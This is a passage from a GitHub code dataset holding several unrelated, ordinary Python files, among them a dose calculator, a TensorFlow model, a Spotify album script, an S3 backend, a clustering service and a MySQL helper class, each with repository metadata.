diabetic')\r\n","repo_name":"sumaaan/Diabetes-Predection-using-Ensemble-Learning","sub_path":"predectivesystem.py","file_name":"predectivesystem.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"2265425581","text":"import numpy as np\n\ndef dose(Gy,mean_energy_dep):\n eV=1.60218e-19 # ev to Joule\n volume = 1.161e-5#1.161e-5 # mass of volume in kg -> 1.161e-5: cell nucleus volume -> 1.131e-13\n deposit2Joule = eV*mean_energy_dep\n numberProt = Gy*volume/deposit2Joule\n print(numberProt)\n return int(numberProt)\n\n\nif __name__=='__main__': # test function\n print(dose(np.array([1,2,3,5,8,10]),75369))\n","repo_name":"JohannesTjeltaMaster/PythonMC","sub_path":"src1/Dose.py","file_name":"Dose.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"6734954576","text":"import numpy as np\nimport tensorflow as tf\ntfkl = tf.keras.layers\n\n\nclass FourierFeature(tfkl.Layer):\n def __init__(self, units=128, preset=True):\n super(FourierFeature, self).__init__()\n self.PI = tf.constant(np.pi, dtype=tf.float32)\n if preset:\n self.B = tf.constant(10.*np.random.randn(2, units), dtype=tf.float32)\n else:\n self.B = self.add_weight(shape=(2, units), initializer=tf.keras.initializers.RandomUniform(-15.0, 15.0), dtype=tf.float32, trainable=True)\n\n def call(self, x):\n proj = tf.matmul((2*self.PI*x), self.B)\n return tf.concat([tf.sin(proj), tf.cos(proj)], axis=-1)\n\n\nclass Generator(tf.keras.Model):\n def __init__(self, n_layers=4, units=128, dim=256, preset=True):\n super(Generator, self).__init__()\n self.rff = FourierFeature(units, preset)\n self.denses = []\n for i in range(n_layers):\n self.denses.append(tfkl.Dense(dim, activation='relu'))\n self.final = tfkl.Dense(3, activation='sigmoid')\n\n def call(self, x, use_B=True):\n if use_B:\n x = self.rff(x)\n for dense in self.denses:\n x = dense(x)\n return self.final(x)","repo_name":"gdao-research/FourierFeatureMapping","sub_path":"rff/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34309472142","text":"import os\nimport pathlib\nimport json\nimport tempfile\n\nfrom redcap_bridge.project_building import build_project, customize_project\nfrom redcap_bridge.project_validation import validate_project_against_template_parts\nfrom redcap_bridge.server_interface import (upload_datadict, download_records,\n check_external_modules)\n\ndef setup_project(proj_folder, working_dir=None, include_provenance=True):\n \"\"\"\n Build a project csv from its specifications and setup on the server\n\n Parameters\n ----------\n proj_folder: (path)\n folder containing the project specification files `project.json`,\n `structure.csv` and `customizations.csv`\n working_dir: (path)\n directory in which to store temporarily generated project files\n include_provenance: (bool)\n include hidden provenance information in project csv.\n Default: True\n \"\"\"\n\n if working_dir is None:\n working_dir = tempfile.TemporaryDirectory(prefix='redcap_bridge_').name\n\n working_dir = pathlib.Path(working_dir)\n proj_folder = pathlib.Path(proj_folder)\n\n if not working_dir.exists():\n os.mkdir(working_dir)\n\n with open(proj_folder / 'project.json') as f:\n proj_conf = json.load(f)\n\n build_project(proj_folder / 'structure.csv', working_dir / 'build.csv',\n include_provenance=include_provenance)\n customize_project(working_dir / 'build.csv',\n proj_folder / 'customizations.csv',\n output_file=working_dir / 'customized.csv')\n validate_project_against_template_parts(working_dir / 'customized.csv',\n *proj_conf['validation'])\n check_external_modules(proj_folder / 'project.json')\n\n upload_datadict(working_dir / 'customized.csv', proj_folder / 'project.json')\n","repo_name":"INT-NIT/DigLabTools","sub_path":"redcap_bridge/project_control.py","file_name":"project_control.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"32799004870","text":"#!/usr/bin/python3\n\"\"\" A script that returns Pascal triangle for n number\"\"\"\n\n\ndef pascal_triangle(n):\n \"\"\"A functionn that returns Pascal triangle with n rows\"\"\"\n outterList = []\n\n for eachRow in range(n):\n # initializing the inner list that rep. the columns\n innerList = []\n for eachCol in range(eachRow + 1):\n if eachCol == 0 or eachCol == eachRow:\n innerList.append(1)\n else:\n innerList.append(\n outterList[eachRow - 1][eachCol - 1] +\n outterList[eachRow - 1][eachCol])\n outterList.append(innerList)\n return (outterList)\n","repo_name":"cgrade/alx-interview","sub_path":"0x00-pascal_triangle/0-pascal_triangle.py","file_name":"0-pascal_triangle.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22421990923","text":"\"\"\"Module containing the methods relating to task creation.\"\"\"\n\nfrom pypika import Query, Table\nfrom rich.markup import escape\n\nfrom next_task.interface.console_output import Style, TaskTable\n\nfrom .database import Database\n\nconsole = Style().console()\n\n\nclass CreateTask:\n \"\"\"Create a task.\"\"\"\n\n def __init__(self, task_summary):\n \"\"\"Instansiate the class.\"\"\"\n task = Table('task')\n query = Query.into(task).columns('summary')\n new_task = Database().write(str(query.insert(task_summary)))\n console.print(f\"[info][b]Created Task {new_task}:[/b][/info]\",\n f\"[highlight]{escape(task_summary)}[/highlight]\")\n\n\nclass GetNextTask:\n \"\"\"Return the next task in the task db.\"\"\"\n\n def __init__(self):\n \"\"\"Instansiate the class.\"\"\"\n query = \"SELECT task_id, summary FROM task_list LIMIT 1;\"\n self.task = Database().read(str(query))\n\n def print(self):\n \"\"\"Print the task to the console.\"\"\"\n if self.confirm_next_task():\n id = self.task[0]['task_id']\n summary = self.task[0]['summary']\n console.print(f\"[info][b]{id}: [/b][/info]{escape(summary)}\",\n style=\"highlight\")\n else:\n console.print(\"[green][b]Congratulations![/b] \"\n \"There are no more tasks on your task list\\n\"\n \"Take a break and have a cup of tea.[/green]\")\n\n def confirm_next_task(self):\n \"\"\"Confirm that there is a task.\"\"\"\n if self.task:\n return True\n return False\n\n\nclass SkipTask:\n \"\"\"Skip the next task.\"\"\"\n\n def __init__(self):\n \"\"\"Instansiate the class.\"\"\"\n task_skips = Table(\"task_skips\")\n query = Query.into(task_skips).columns(\"task_id\")\n task = GetNextTask()\n if task.confirm_next_task():\n id = task.task[0]['task_id']\n Database().write(str(query.insert(id)))\n console.print(f\"[info][i]Skipped Task {id}[/i][/info]\")\n GetNextTask().print()\n return\n task.print()\n\n\nclass CloseTask:\n \"\"\"Close a task.\"\"\"\n\n def __init__(self):\n \"\"\"Instansiate the class.\"\"\"\n task_status = Table('task_status')\n query = Query.into(task_status).columns(\"task_id\", \"t_status\")\n task = GetNextTask()\n if task.confirm_next_task():\n task_id = task.task[0]['task_id']\n task_summary = task.task[0]['summary']\n Database().write(str(query.insert(task_id, \"closed\")))\n console.print(f\"[green]Closed {task_id}: {task_summary}[/green]\")\n GetNextTask().print()\n return\n task.print()\n\n\nclass ListTasks:\n \"\"\"List the open tasks.\"\"\"\n\n def __init__(self):\n \"\"\"Instansiate the class.\"\"\"\n self.data = Database().read(\"SELECT * FROM task_list;\")\n TaskTable(self.data)\n","repo_name":"MakeJames/Next-Task","sub_path":"next_task/services/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"33257550338","text":"import csv\nimport json\nimport apiconfig\nimport spotipy\nfrom spotipy.oauth2 import SpotifyClientCredentials\n\nedge_cases = {\n ('Slum Village', 'Fantastic, Vol.\\u00a02'): {\n 'album_url': 'https://open.spotify.com/album/22IhsI5JpldSrE7vhidAja',\n 'image_url': 'https://i.scdn.co/image/ab67616d0000b2733999c60eca1a87fd7e7868bc'\n },\n ('Todd Edwards', 'Prima Edizione'): {\n 'album_url': 'https://open.spotify.com/album/6SRbCAQ1zu2r47Bi771rAs',\n 'image_url': 'primaedizione.jpg'\n },\n ('KNOWER', 'KNOWER FOREVER'): {\n 'album_url': '',\n 'image_url': 'knowerforever.jpg'\n }\n} \n\nclient_credentials_manager = SpotifyClientCredentials(client_id=apiconfig.CLIENT_ID, client_secret=apiconfig.CLIENT_SECRET)\nsp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\n\ndef get_album_urls(artist, album):\n \"\"\" \n Use Spotify API to search \"[artist] [album]\" and return the album URL and image URL\n \"\"\"\n results = sp.search(f'{artist} {album}', type='album', limit=1)\n items = results['albums']['items']\n if len(items) == 0:\n return '', ''\n item = items[0]\n\n album_url = ''\n image_url = ''\n\n urls = item['external_urls']\n album_url = urls['spotify']\n\n images = item['images']\n if len(images) > 0:\n image_url = images[0]['url']\n \n return album_url, image_url \n\ndef read_albums_from_csv(csv_file, json_file=None):\n \"\"\"\n Read albums from CSV file, optionally preserving the data from the JSON file\n \"\"\"\n if json_file:\n with open(json_file, 'r') as f:\n json_data = json.load(f)\n albums_in_json = {}\n for album in json_data:\n albums_in_json[album[\"artist\"], album[\"title\"]] = album\n \n with open(csv_file) as f:\n reader = csv.reader(f)\n albums = []\n for row in reader:\n album, artist, year, descriptors, song1, song2, date_added = row\n\n album = album.replace('Vol. ', 'Vol.\\u00A0')\n\n if album == 'Album' and artist == 'Artist':\n continue\n \n if (artist, album) in albums_in_json:\n album_url = albums_in_json[artist, album]['album_url']\n image_url = albums_in_json[artist, album]['image_url']\n elif (artist, album) in edge_cases:\n album_url, image_url = edge_cases[artist, album]['album_url'], edge_cases[artist, album]['image_url']\n else:\n album_url, image_url = get_album_urls(artist, album)\n\n albums.append({\n \"title\": album,\n \"artist\": artist,\n \"year\": year,\n \"descriptors\": descriptors.split(', '),\n \"tracks\": [song1, song2],\n \"album_url\": album_url,\n \"image_url\": image_url,\n \"date_added\": date_added\n })\n \n return albums\n\nalbums = read_albums_from_csv('full-moon-albums.csv', 'full-moon-albums.json')\n\n# write albums to JSON\nwith open('full-moon-albums.json', 'w') as f:\n json.dump(albums, f, indent=4)","repo_name":"adamaaronson/full-moon-albums","sub_path":"src/data/process-albums.py","file_name":"process-albums.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"25241479378","text":"import boto3\nimport botocore.exceptions\n\nfrom .backend import FileBackend\nfrom .exceptions import BackendException, BackendInitException\n\n\nclass S3Backend(FileBackend):\n backend = \"s3\"\n\n def __init__(self, config: dict):\n try:\n self.aws_access_key_id = config[\"s3\"][\"aws_access_key_id\"]\n self.aws_secret_access_key = config[\"s3\"][\"aws_secret_access_key\"]\n self.aws_storage_bucket_name = config[\"s3\"][\"aws_storage_bucket_name\"]\n except KeyError:\n raise BackendInitException(\"the S3 backend requires 'aws_access_key_id', 'aws_secret_access_key', \"\n \"and 'aws_storage_bucket_name' in the 's3' key of the JSON POST body.\")\n try:\n self.client = boto3.client(\n \"s3\",\n aws_access_key_id=self.aws_access_key_id,\n aws_secret_access_key=self.aws_secret_access_key,\n )\n except Exception as e:\n raise BackendInitException(f\"failed to initialize AWS client: {str(e)}\")\n\n def get_file(self, uri: str) -> bytes:\n try:\n obj = self.client.get_object(Bucket=self.aws_storage_bucket_name, Key=uri)\n return obj[\"Body\"].read()\n except botocore.exceptions.ClientError as e:\n raise BackendException(f\"S3 client error: {str(e)}\")\n except Exception as e:\n raise BackendException(f\"the read operation unexpectedly failed: {str(e)}\")\n","repo_name":"Enterprise-CMCS/cmcs-eregulations","sub_path":"solution/text-extractor/backends/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"63"} +{"seq_id":"2571133165","text":"from typing import List\nimport numpy as np\nfrom app.helpers.cluster.base_cluster import ClusterObject, ClusterService\n\n\nclass ThesisClusterObject(ClusterObject):\n title_vector: list\n category_vector: list\n expected_result_vector: list\n problem_solve_vector: list\n\ndef multiply_array(input: list, multiplier: float):\n result = []\n for item in input:\n result.append(item * multiplier)\n return result\n\ndef get_medium_array(input: list, total_uik: float):\n result = np.zeros_like(input[0])\n\n for item in input:\n result += np.array(item)\n \n result /= total_uik\n return result.tolist()\n\n\nclass ThesisClusterService(ClusterService):\n def __init__(self, field_weights, field_balance_multipliers):\n self.field_weights = field_weights\n self.field_balance_multipliers = field_balance_multipliers\n\n def get_distance_between_two_object(self, first_object: ThesisClusterObject, second_object: ThesisClusterObject) -> float:\n dis1 = np.linalg.norm(np.array(first_object.title_vector) - np.array(second_object.title_vector)) * self.field_weights[0] * self.field_balance_multipliers[0]\n dis2 = np.linalg.norm(np.array(first_object.category_vector) - np.array(second_object.category_vector)) * self.field_weights[1] * self.field_balance_multipliers[1]\n dis3 = np.linalg.norm(np.array(first_object.expected_result_vector) - np.array(second_object.expected_result_vector)) * self.field_weights[2] * self.field_balance_multipliers[2]\n dis4 = np.linalg.norm(np.array(first_object.problem_solve_vector) - np.array(second_object.problem_solve_vector)) * self.field_weights[3] * self.field_balance_multipliers[3]\n return dis1 + dis2 + dis3 + dis4\n \n def calculate_centroid_from_list_and_uik(self, uik_pow: list, data: List[ThesisClusterObject]) -> ThesisClusterObject:\n list_title = [multiply_array(item.title_vector, uik) for uik, item in zip(uik_pow, data)]\n list_category = [multiply_array(item.category_vector, uik) for uik, item in zip(uik_pow, data)]\n list_expected = [multiply_array(item.expected_result_vector, uik) for uik, item in zip(uik_pow, data)]\n list_problem = [multiply_array(item.problem_solve_vector, uik) for uik, item in zip(uik_pow, data)]\n \n total_uik = sum(uik_pow)\n new_centroid = ThesisClusterObject(\n title_vector=get_medium_array(list_title, total_uik),\n category_vector=get_medium_array(list_category, total_uik),\n expected_result_vector=get_medium_array(list_expected, total_uik),\n problem_solve_vector=get_medium_array(list_problem, total_uik)\n )\n return new_centroid","repo_name":"tienbaovuong/algo-clustering-server","sub_path":"app/worker/thesis_cluster_class.py","file_name":"thesis_cluster_class.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1304140629","text":"#!/usr/bin/python3\n\"\"\"Module listing the title of top 10 hot post in the subreddit\"\"\"\nimport requests\n\n\ndef top_ten(subreddit):\n \"\"\"list the title of top 10 hot post in the subreddit\"\"\"\n url = f'https://www.reddit.com/r/{subreddit}/hot.json?limit=10'\n user = {'User-Agent': 'Test123'}\n response = requests.get(url, headers=user, allow_redirects=False)\n if response.status_code == 404:\n print('None')\n return\n for post in response.json().get('data').get('children'):\n print(post.get('data').get('title'))\n","repo_name":"adut24/holbertonschool-system_engineering-devops","sub_path":"0x16-api_advanced/1-top_ten.py","file_name":"1-top_ten.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22630089323","text":"\r\n\r\n# ---------------------------------------------file rename and copy\r\nimport os,glob, datetime\r\n\r\nname = ('')\r\nCurrent_Date = datetime.datetime.today().strftime('%Y_%m_%d' + '_' + name)\r\nprint(Current_Date)\r\nsrc = Current_Date\r\nos.chdir('C:/GDSRC/Data/')\r\n\r\nfor file in os.listdir():\r\n print(file)\r\n if file.startswith('지디스'):\r\n print(file)\r\n os.rename(file, 'C:/GDSRC/Data/' + src + 'Labgen.xls')\r\n\r\n","repo_name":"MigoJJ/RoutineCheck","sub_path":"A_File_Control/Excel/Labgen_Rename_Copy.py","file_name":"Labgen_Rename_Copy.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29197353187","text":"filename = 'encrypt_file'\nmessage = input('Eneter you Message: ')\nkey = int (input('Enter the Key value: '))\n\ndef encrypt(fname,msg, key): \n with open(fname,'w') as f:\n for ch in msg:\n f.write(chr(ord(ch) + key ))\n \n\ndef decrypt(fname, key):\n org_msg = ''\n with open(fname,'r') as f:\n msg = f.read()\n for ch in msg:\n org_msg += chr(ord(ch) - key )\n with open(f.name + '_decrypt', 'w') as fw:\n fw.write(org_msg)\n \n \n \nencrypt(filename,message, key)\ndecrypt(filename, key)\n# print(org_message)","repo_name":"m-bastam/python_class","sub_path":"Files_sample.py","file_name":"Files_sample.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"5527693331","text":"import json\r\nfrom models import *\r\nfrom config import db\r\n\r\n\r\ndef insert_data_users(input_data):\r\n #наполняем User\r\n for row in input_data:\r\n db.session.add(\r\n User(\r\n id=row.get(\"id\"),\r\n first_name=row.get(\"first_name\"),\r\n last_name=row.get(\"last_name\"),\r\n age=row.get(\"age\"),\r\n email=row.get(\"email\"),\r\n role=row.get(\"role\"),\r\n phone=row.get(\"phone\")\r\n # **row\r\n )\r\n )\r\n db.session.commit()\r\n\r\n\r\ndef insert_data_orders(input_data):\r\n # наполняем Order\r\n for row in input_data:\r\n db.session.add(\r\n Order(\r\n id=row.get(\"id\"),\r\n name=row.get(\"name\"),\r\n description=row.get(\"description\"),\r\n start_date=row.get(\"start_date\"),\r\n end_date=row.get(\"end_date\"),\r\n address=row.get(\"address\"),\r\n price=row.get(\"price\"),\r\n customer_id=row.get(\"customer_id\"),\r\n executor_id=row.get(\"executor_id\")\r\n # **row\r\n )\r\n )\r\n db.session.commit()\r\n\r\n\r\ndef insert_data_offers(input_data):\r\n # наполняем Offer\r\n for row in input_data:\r\n db.session.add(\r\n Offer(\r\n id=row.get(\"id\"),\r\n order_id=row.get(\"order_id\"),\r\n executor_id=row.get(\"executor_id\")\r\n # **row\r\n )\r\n )\r\n db.session.commit()\r\n\r\n\r\ndef get_all(model):\r\n #получаем данные из выбранной модели\r\n result = []\r\n for row in db.session.query(model).all():\r\n result.append(row.to_dict())\r\n return result\r\n\r\n\r\ndef get_all_by_id(model, user_id):\r\n # получаем данные из выбранной модели по user_id\r\n try:\r\n return db.session.query(model).get(user_id).to_dict()\r\n except Exception:\r\n return {}\r\n\r\n\r\ndef update_universal(model, user_id, values):\r\n #Обновляем данные из базы\r\n try:\r\n db.session.query(model).filter(model.id == user_id).update(values)\r\n db.session.commit()\r\n except Exception as e:\r\n print(e)\r\n return {}\r\n\r\n\r\ndef delete_universal(model, user_id):\r\n #Удаляем данные из базы\r\n try:\r\n db.session.query(model).filter(model.id == user_id).delete()\r\n db.session.commit()\r\n except Exception as e:\r\n print(e)\r\n return {}\r\n\r\n\r\ndef init_db():\r\n #при старте очищаем данные, создаем модели и наполняем модели данными\r\n db.drop_all()\r\n db.create_all()\r\n\r\n with open(\"data/users.json\", encoding=\"utf-8\") as file:\r\n data = json.load(file)\r\n insert_data_users(data)\r\n\r\n with open(\"data/offers.json\", encoding=\"utf-8\") as file:\r\n data = json.load(file)\r\n insert_data_offers(data)\r\n\r\n with open(\"data/orders.json\", encoding=\"utf-8\") as file:\r\n data = json.load(file)\r\n insert_data_orders(data)\r\n","repo_name":"Nik16221/HW16","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"33800354759","text":"import json\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\nimport math\nf = open('smooth.json',)\nData = json.load(f)\n\n\nclor = ['blue' , 'green' , 'red']\nplt.title(\"Before Smooth\")\nplt.xlabel(\"x axis\")\nplt.ylabel(\"z axis\")\n\nx = []\ny = []\n\nfor curData in Data:\n x.append(curData[0])\n y.append(-curData[2])\n\nplt.scatter(x,y,s=50)\nplt.show()","repo_name":"chulanpro5/Sign-language-translator-device","sub_path":"Draw/DrawSmooth.py","file_name":"DrawSmooth.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"77659186","text":"# -*- coding: utf-8 -*- \n\nfrom common.datastructures import Enumeration\nfrom notifications import strings\n\nNOTIFICATION_TYPE_CHOICES = Enumeration([\n (1, 'CIRCUIT_CREATED', strings.CIRCUIT_CREATED),\n (2, 'CIRCUIT_FAVORITED', strings.CIRCUIT_FAVORITED),\n (3, 'CIRCUIT_REMIXED', strings.CIRCUIT_REMIXED),\n (4, 'CIRCUIT_UPDATED', strings.CIRCUIT_UPDATED),\n (5, 'USER_FOLLOWED', strings.USER_FOLLOWED),\n (6, 'CONTENT_SHARED', strings.CONTENT_SHARED)\n])\n\n\n# API\nAPI_DEFAULT_NOTIFICATIONS_LIMIT = 10\nAPI_DEFAULT_NOTIFICATIONS_OFFSET = 0\n","repo_name":"mathiasbc/WR","sub_path":"apps/notifications/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29477809743","text":"#/usr/bin/env python3\nimport sys\nimport yaml\nimport xml.etree.ElementTree as ElementTree\n\nfrom py_tdf.validate import validate\n\n# NTRT yaml expects node ids to be alphanumeric\n# plain numbers are not allowed\nID_PREFIX = 'a_'\n\n\n\ndef tdf2ntrt_yaml(tdf_path):\n tree = ElementTree.parse(tdf_path)\n root = tree.getroot()\n\n validate(tree)\n\n # just map it to JSON-like structure, no additional checks\n # assuming that tdf is correct\n result = {'nodes': {}, 'pair_groups': {}, 'builders': {}}\n positions = root.findall('initial_positions')[0].findall('node')\n\n for pos in positions:\n id = f\"{ID_PREFIX}{pos.attrib['id']}\"\n [x, y, z] = list(map(float, pos.attrib['xyz'].split()))\n result['nodes'][id] = [x+10, y+10, z+10]\n\n rods = root.findall('composition')[0].findall('rod')\n for el in rods:\n id1 = f\"{ID_PREFIX}{el.attrib['node1']}\"\n id2 = f\"{ID_PREFIX}{el.attrib['node2']}\"\n class_name = f\"{ID_PREFIX}{el.attrib['class']}\"\n result['pair_groups'][class_name] = result['pair_groups'].get(class_name, [])\n result['pair_groups'][class_name].append([id1, id2])\n\n cables = root.findall('composition')[0].findall('cable')\n for el in cables:\n id1 = f\"{ID_PREFIX}{el.attrib['node1']}\"\n id2 = f\"{ID_PREFIX}{el.attrib['node2']}\"\n class_name = f\"{ID_PREFIX}{el.attrib['class']}\"\n result['pair_groups'][class_name] = result['pair_groups'].get(class_name, [])\n result['pair_groups'][class_name].append([id1, id2])\n\n for el in root.findall('rod_class'):\n id = f\"{ID_PREFIX}{el.attrib['id']}\"\n result['builders'][id] = {\n 'class': 'tgRodInfo',\n 'parameters': {\n # 'stiffness': float(el.attrib['stiffness']),\n # as far as I understand, you do not specify rest_length\n # for rod in NTRT. Didn't find such config parameter.\n # I assume it is computed from node positions\n 'density': 0.688,\n 'radius': 0.05,\n }\n }\n for el in root.findall('cable_class'):\n id = f\"{ID_PREFIX}{el.attrib['id']}\"\n result['builders'][id] = {\n 'class': 'tgBasicActuatorInfo',\n 'parameters': {\n 'stiffness': float(el.attrib['stiffness']),\n # 'damping': 10,\n # 'pretension': 1000,\n # 'minRestLength': float(el.attrib['stiffness']),\n }\n }\n\n return result\n\nif __name__ == '__main__':\n # ran as a script, we need to split out YAML data for given tdf file\n [tdf_path, *rest] = sys.argv[1:]\n # print('path: ', tdf_path)\n values = tdf2ntrt_yaml(tdf_path)\n print(yaml.dump(values, default_flow_style=False))\n","repo_name":"vladimir-vg/tensegrity-document-format","sub_path":"py_tdf/tdf2ntrt_yaml.py","file_name":"tdf2ntrt_yaml.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"34197285692","text":"import logging\nimport os\n\nimport requests\n\nfrom app.model.credential_schema_tables_model.instructor_role_model import InstructorRoleModel\nfrom app.persistence.credential_schema_tables_persistence.instructor_role_persistence import InstructorRolePersistence\nfrom app.services.issue_params import set_params\nfrom app.util.error_handlers import RecordNotFound\n\n\nclass InstructorRoleService:\n @classmethod\n def add(cls, user_id, user_name, name, description, type, external_id):\n\n instructor_role = InstructorRoleModel(name=name, description=description, type=type, external_id=external_id)\n instructor_role = InstructorRolePersistence.add(user_id, user_name, instructor_role)\n return instructor_role\n\n @classmethod\n def update(cls, user_id, user_name, uuid, args):\n instructor_role = InstructorRolePersistence.get(uuid)\n\n if instructor_role is None:\n raise RecordNotFound(\"'instructor role' with uuid '{}' not found.\".format(uuid))\n\n instructor_role = InstructorRoleModel(\n uuid=uuid,\n name=args.get(\"name\", instructor_role.name),\n description=args.get(\"description\", instructor_role.description),\n type=args.get(\"type\", instructor_role.type),\n external_id=args.get(\"external_id\", instructor_role.external_id)\n )\n instructor_role = InstructorRolePersistence.update(user_id, user_name, instructor_role)\n\n return instructor_role\n\n @classmethod\n def delete(cls, user_id, user_name, uuid):\n instructor_role = InstructorRolePersistence.get(uuid)\n if instructor_role is None:\n raise RecordNotFound(\"'instructor role' with uuid '{}' not found.\".format(uuid))\n InstructorRolePersistence.delete(user_id, user_name, instructor_role)\n return instructor_role\n\n @classmethod\n def get(cls, uuid):\n instructor_role = InstructorRolePersistence.get(uuid)\n if instructor_role is None:\n raise RecordNotFound(\"'instructor role' with uuid '{}' not found.\".format(uuid))\n return instructor_role\n\n @classmethod\n def get_all(cls):\n return InstructorRolePersistence.get_all()\n\n @classmethod\n def get_all_by_filter(cls, filter_dict):\n return InstructorRolePersistence.get_all_by_filter(filter_dict)\n\n @classmethod\n def issue(cls, external_id: str):\n records = InstructorRolePersistence.get_by_external_user_id(external_id)\n pocket_core_api_credential = os.getenv(\"DATA_BROKER_URL\") + \"/credential/issue\"\n\n logging.debug(f\"Issuing badge credentials for: {external_id} total: {len(records)}\")\n\n for record in records:\n params = set_params(external_id, \"instructor_role\", record._to_dict())\n requests.post(pocket_core_api_credential, json=params)\n","repo_name":"sSeyfoddini/somayeh","sub_path":"app/services/credential_schema_tables_services/instructor_role_service.py","file_name":"instructor_role_service.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"28018621933","text":"import traceback\nfrom dataclasses import dataclass\nfrom typing import List, Any\n\nfrom pymysql import connections as mysql_connection\nimport pymysql\nfrom myLogger.Logger import getLogger as GetLogger\n\nlog = GetLogger(__name__)\n\n\n@dataclass\nclass Mysql:\n host: str\n port: int\n user: str\n password: str\n database: str\n connection: mysql_connection\n cursor: Any\n sql: str\n\n\nclass MySQLDatabase(Mysql):\n def __init__(self, host, port, user, password, database, **kwargs):\n self.host = host\n self.port = port\n self.user = user\n self.password = password\n self.database = database\n self.connection = self.connect(host, port, user, password, database, **kwargs)\n self.cursor = self.connection.cursor()\n\n def connect(self, host, port, user, password, database, **kwargs) -> mysql_connection:\n try:\n\n charset = kwargs.get('charset', 'utf8mb4')\n host = host if host else self.host\n port = port if port else self.port\n user = user if user else self.user\n password = password if password else self.password\n database = database if database else self.database\n connection = pymysql.connect(host=host,\n port=port,\n user=user,\n password=password,\n db=database,\n charset=charset,\n )\n return connection\n except Exception as e:\n log.error(f'Error while connecting to Milvus and MySQL: {e}')\n log.error(traceback.format_exc())\n raise e\n\n def execute_batch_query(self, queries):\n try:\n with self.connection.cursor() as cursor:\n for query in queries:\n cursor.execute(query)\n self.connection.commit()\n except Exception as e:\n log.error(f'Error while executing batch query: \\n{queries} \\n{e}')\n log.error(traceback.format_exc())\n self.connection.rollback()\n raise e\n finally:\n cursor.close()\n\n def execute_query(self, query, args=None):\n try:\n with self.connection.cursor() as cursor:\n cursor.execute(query, args)\n self.connection.commit()\n except Exception as e:\n log.error(f'Error while executing query: \\n{query} \\n{e}')\n log.error(traceback.format_exc())\n self.connection.rollback()\n raise e\n finally:\n cursor.close()\n\n def query(self, query, args=None):\n try:\n with self.connection.cursor() as cursor:\n cursor.execute(query, args)\n result = cursor.fetchall()\n self.connection.commit()\n except Exception as e:\n log.error(f'Error while executing query: \\n{query} \\n{e}')\n log.error(traceback.format_exc())\n self.connection.rollback()\n raise e\n finally:\n cursor.close()\n return result\n\n def insert(self, query: str, args=None):\n try:\n # validate query\n if \"insert\" not in query.split(\" \"):\n raise ValueError(\"Query must be an insert query\")\n return self.execute_query(query, args)\n except Exception as e:\n log.error(f'Error while executing insert query: \\n{query} \\n{e}')\n log.error(traceback.format_exc())\n self.connection.rollback()\n raise e\n\n def update(self, query, args):\n \"\"\"\n Updates data in MySQL\n\n :param query: query to be executed\n :param args: arguments to be passed to the query\n :return: None\n \"\"\"\n try:\n # validate query\n if \"update\" not in query.split(\" \"):\n raise ValueError(\"Query must be an update query\")\n return self.execute_query(query, args)\n except Exception as e:\n log.error(f'Error while executing update query: \\n{query} \\n{e}')\n log.error(traceback.format_exc())\n self.connection.rollback()\n raise e\n\n def delete(self, query, args):\n \"\"\"\n Deletes data from MySQL\n\n :param query: query to be executed\n :param args: arguments to be passed to the query\n :return: None\n \"\"\"\n try:\n # validate query\n if \"delete\" not in query.split(\" \"):\n raise ValueError(\"Query must be a delete query\")\n return self.execute_query(query, args)\n except Exception as e:\n log.error(f'Error while executing delete query: \\n{query} \\n{e}')\n log.error(traceback.format_exc())\n self.connection.rollback()\n raise e\n\n def load_data_to_mysql(self, table_name, data) -> None:\n \"\"\"\n Loads data into MySQL\n\n :param table_name: name of the table\n :param data: data to be loaded\n :return: None\n \"\"\"\n sql = \"insert into \" + table_name + \" (id, question, answer) values (%s, %s, %s);\"\n # check if the data to be inserted is already present\n check_sql = f\"SELECT COUNT(*) FROM {table_name} WHERE id = %s\"\n try:\n cnt = 0\n for row in data:\n with self.connection.cursor() as cursor:\n cursor.execute(check_sql, (row[0],))\n result = cursor.fetchone()[0]\n if result == 0:\n cursor.execute(sql, row)\n self.connection.commit()\n cnt += 1\n if cnt == 